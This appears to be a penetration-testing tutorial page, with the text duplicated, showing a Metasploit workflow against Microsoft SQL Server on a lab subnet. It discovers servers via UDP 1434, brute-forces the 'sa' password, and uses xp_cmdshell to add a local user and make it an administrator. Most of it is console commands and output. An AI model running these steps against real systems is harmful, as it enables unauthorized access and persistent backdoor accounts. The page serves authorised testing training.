Hunting for MSSQL

One of my personal favorites is the advanced UDP footprinting of MSSQL servers. If you're performing an internal penetration test this is a must use tool. When MSSQL installs, it installs either on port 1433 TCP or a randomized dynamic TCP port. If the port is dynamically generated, this can be rather tricky for an attacker to find the MSSQL servers to attack. Luckily with Microsoft, they have blessed us with port 1434 UDP that once queried allows you to pull quite a bit of information about the SQL server including what port the TCP listener is on. Let's load the module and use it to discover multiple servers.

msf > search mssql [*] Searching loaded modules for pattern 'mssql'... Exploits ======== Name Description ---- ----------- windows/mssql/lyris_listmanager_weak_pass Lyris ListManager MSDE Weak sa Password windows/mssql/ms02_039_slammer Microsoft SQL Server Resolution Overflow windows/mssql/ms02_056_hello Microsoft SQL Server Hello Overflow windows/mssql/mssql_payload Microsoft SQL Server Payload Execution Auxiliary ========= Name Description ---- ----------- admin/mssql/mssql_enum Microsoft SQL Server Configuration Enumerator admin/mssql/mssql_exec Microsoft SQL Server xp_cmdshell Command Execution admin/mssql/mssql_sql Microsoft SQL Server Generic Query scanner/mssql/mssql_login MSSQL Login Utility scanner/mssql/mssql_ping MSSQL Ping Utility msf > use scanner/mssql/mssql_ping msf auxiliary(mssql_ping) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier THREADS 1 yes The number of concurrent threads msf auxiliary(mssql_ping) > set RHOSTS 10.211.55.1/24 RHOSTS => 10.211.55.1/24 msf auxiliary(mssql_ping) > exploit [*] SQL Server information for 10.211.55.128: [*] tcp = 1433 [*] np = SSHACKTHISBOX-0pipesqlquery [*] Version = 8.00.194 [*] InstanceName = MSSQLSERVER [*] IsClustered = No [*] ServerName = SSHACKTHISBOX-0 [*] Auxiliary module execution completed
The first command we issued was to search for any 'mssql' plugins. The second set of instructions was the 'use scanner/mssql/mssql_ping', this will load the scanner module for us. Next, 'show options' allows us to see what we need to specify. The 'set RHOSTS 10.211.55.1/24' sets the subnet range we want to start looking for SQL servers on. You could specify a /16 or whatever you want to go after. I would recommend increasing the number of threads as this could take a long time with a single threaded scanner.

After the 'run' command is issued, a scan is going to be performed and pull back specific information about the MSSQL server. As we can see, the name of the machine is "SSHACKTHISBOX-0" and the TCP port is running on 1433. At this point you could use the 'scanner/mssql/mssql_login' module to brute-force the password by passing the module a dictionary file. Alternatively, you could also use Fast-Track, medusa, or hydra to do this. Once you successfully guess the password, there's a neat little module for executing the xp_cmdshell stored procedure.

msf auxiliary(mssql_login) > use admin/mssql/mssql_exec msf auxiliary(mssql_exec) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- CMD cmd.exe /c echo OWNED > C:\owned.exe no Command to execute HEX2BINARY /pentest/exploits/framework3/data/exploits/mssql/h2b no The path to the hex2binary script on the disk MSSQL_PASS no The password for the specified username MSSQL_USER sa no The username to authenticate as RHOST yes The target address RPORT 1433 yes The target port msf auxiliary(mssql_exec) > set RHOST 10.211.55.128 RHOST => 10.211.55.128 msf auxiliary(mssql_exec) > set MSSQL_PASS password MSSQL_PASS => password msf auxiliary(mssql_exec) > set CMD net user rel1k ihazpassword /ADD cmd => net user rel1k ihazpassword /ADD msf auxiliary(mssql_exec) > exploit The command completed successfully. [*] Auxiliary module execution completed
Looking at the output of the 'net user rel1k ihazpassword /ADD', we have successfully added a user account named "rel1k", from there we could issue 'net localgroup administrators rel1k /ADD' to get a local administrator on the system itself. We have full control over this system at this point.

Hunting for MSSQL

 msf > search mssql
[*] Searching loaded modules for pattern 'mssql'...

Exploits
========

   Name                                       Description
   ----                                       -----------
   windows/mssql/lyris_listmanager_weak_pass  Lyris ListManager MSDE Weak sa Password
   windows/mssql/ms02_039_slammer             Microsoft SQL Server Resolution Overflow
   windows/mssql/ms02_056_hello               Microsoft SQL Server Hello Overflow
   windows/mssql/mssql_payload                Microsoft SQL Server Payload Execution


Auxiliary
=========

   Name                       Description
   ----                       -----------
   admin/mssql/mssql_enum     Microsoft SQL Server Configuration Enumerator
   admin/mssql/mssql_exec     Microsoft SQL Server xp_cmdshell Command Execution
   admin/mssql/mssql_sql      Microsoft SQL Server Generic Query
   scanner/mssql/mssql_login  MSSQL Login Utility
   scanner/mssql/mssql_ping   MSSQL Ping Utility

msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   THREADS  1                yes       The number of concurrent threads 

msf auxiliary(mssql_ping) > set RHOSTS 10.211.55.1/24
RHOSTS => 10.211.55.1/24
msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 10.211.55.128:
[*]    tcp             = 1433
[*]    np              = SSHACKTHISBOX-0pipesqlquery
[*]    Version         = 8.00.194
[*]    InstanceName    = MSSQLSERVER
[*]    IsClustered     = No
[*]    ServerName      = SSHACKTHISBOX-0
[*] Auxiliary module execution completed

The first command we issued was to search for any 'mssql' plugins. The second set of instructions was the 'use scanner/mssql/mssql_ping', this will load the scanner module for us. Next, 'show options' allows us to see what we need to specify. The 'set RHOSTS 10.211.55.1/24' sets the subnet range we want to start looking for SQL servers on. You could specify a /16 or whatever you want to go after. I would recommend increasing the number of threads as this could take a long time with a single threaded scanner.

After the 'run' command is issued, a scan is going to be performed and pull back specific information about the MSSQL server. As we can see, the name of the machine is "SSHACKTHISBOX-0" and the TCP port is running on 1433. At this point you could use the 'scanner/mssql/mssql_login' module to brute-force the password by passing the module a dictionary file. Alternatively, you could also use Fast-Track, medusa, or hydra to do this. Once you successfully guess the password, there's a neat little module for executing the xp_cmdshell stored procedure.

 msf auxiliary(mssql_login) > use admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > show options

Module options:

   Name        Current Setting                                       Required  Description
   ----        ---------------                                       --------  -----------
   CMD         cmd.exe /c echo OWNED > C:\owned.exe                  no        Command to execute
   HEX2BINARY  /pentest/exploits/framework3/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
   MSSQL_PASS                                                        no        The password for the specified username
   MSSQL_USER  sa                                                    no        The username to authenticate as
   RHOST                                                             yes       The target address
   RPORT       1433                                                  yes       The target port


msf auxiliary(mssql_exec) > set RHOST 10.211.55.128
RHOST => 10.211.55.128
msf auxiliary(mssql_exec) > set MSSQL_PASS password
MSSQL_PASS => password
msf auxiliary(mssql_exec) > set CMD net user rel1k ihazpassword /ADD
cmd => net user rel1k ihazpassword /ADD
msf auxiliary(mssql_exec) > exploit

The command completed successfully.


[*] Auxiliary module execution completed

Looking at the output of the 'net user rel1k ihazpassword /ADD', we have successfully added a user account named "rel1k", from there we could issue 'net localgroup administrators rel1k /ADD' to get a local administrator on the system itself. We have full control over this system at this point.

Username
Password
Remember me

System message

Hunting for MSSQL

Hunting for MSSQL